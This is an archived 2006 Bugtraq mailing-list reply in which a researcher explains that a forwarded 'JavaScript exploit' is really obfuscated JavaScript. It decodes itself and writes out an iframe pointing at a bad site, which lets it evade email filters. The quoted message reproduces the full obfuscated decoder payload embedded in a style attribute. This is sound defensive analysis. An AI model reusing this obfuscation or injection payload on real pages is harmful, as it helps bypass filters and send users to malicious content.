lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.BSO.4.58.0602180944460.17100@naughty.monkey.org>
Date: Sat, 18 Feb 2006 09:47:23 -0500 (EST)
From: Jose Nazario <jose@...key.org>
To: gandalf@...ital.net
Cc: bugtraq@...urityfocus.com
Subject: Re: Java script exploit


On Fri, 17 Feb 2006 gandalf@...ital.net wrote:

> I just receieved this exploit, I have looked around and all I could find
> lately are the following Java issues: Gentoo Linux Security Advisory
> GLSA 200601-10 - Sun and Blackdown Java: Applet privilege escalation

> I don't have the Java knowledge to figure out what is going on, but it
> doesn't look good.

it's not a javascript exploit, it's obfuscated javascript. basially it
decodes itself to display something along the lines of (tags obscured):

[iframe src=http://badsite/some/dir/stuff] [/iframe]

this can be used to bypass filters that look in your email for known
undesirable sites.

nothing special about it, and no exploit.

> <a target=3D"_blank"  href=3D"www.yahoo.com>"style=3D"background:url\(java/**/script:function dc(x){var l=3Dx.length,b=3D1024,i,j,r,p=3D0,s=3D0,w=3D0,t=3DArray(63,6,22,2,4,19,56,49,24,46,0,0,0,0,0,0,61,0,5,58,48,51,17,18,13,16,11,20,27,47,60,53,8,57,14,7,9,55,36,31,1,40,15,0,0,0,0,44,0,33,41,52,62,32,50,28,43,10,21,12,26,42,59,38,39,34,29,23,45,3,37,25,30,35,54);for(j=3DMath.ceil(l/b);j>0;j--){r=3D'';for(i=3DMath.min(l,b);i>0;i--,l--){w|=3D(t[x.charCodeAt(p++)-48])<<s;if(s){r+=3DString.fromCharCode(165^w&255);w>>=3D8;s-=3D2}else{s=3D6}}document.write(r)}}dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUkoj9woifNDs5kfAMT'))">

________
jose nazario, ph.d.			jose@...key.org
http://monkey.org/~jose/ 		http://infosecdaily.net/
					http://www.wormblog.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ